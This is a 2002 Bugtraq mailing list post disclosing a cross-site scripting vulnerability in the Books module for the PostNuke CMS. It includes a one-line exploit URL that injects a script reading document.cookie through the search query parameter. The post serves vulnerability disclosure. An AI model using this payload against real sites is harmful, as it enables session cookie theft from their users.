Bugtraq mailing list archives

The Books Module for the PostNuke CMS XSS Vulnerability

From: Pistone <jorgep () spdps com ar>
Date: Wed, 2 Oct 2002 21:47:08 -0300

- ----------------------------------------------------
Class :         input Validation Error

Risk :            Due to the simplicity of the attack and the number of sites
                   that run module books the risk is classified as Medium to  
                   High.

URL:             Http://pn-mod-books.sourceforge.net
- ----------------------------------------------------
This Books module version v0.54 is running as a Mutant (PN 0.64) 
This Books module version v0.6  is running as a Rogue (PN 0.7)
- ----------------------------------------------------

Exploit:
       
http://servernuke/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|

Change | x <>


- -------------------------------------------------------
Programmer of Books module receives a copy this report.
- --------------------------------------------------------


Salu2

Pistone
- - --------
Http://www.gauchohack.com.ar
Http://www.hackindex.org

Current thread:

The Books Module for the PostNuke CMS XSS Vulnerability Pistone (Oct 03)
- Re: The Books Module for the PostNuke CMS XSS Vulnerability Michael Schatz (Oct 11)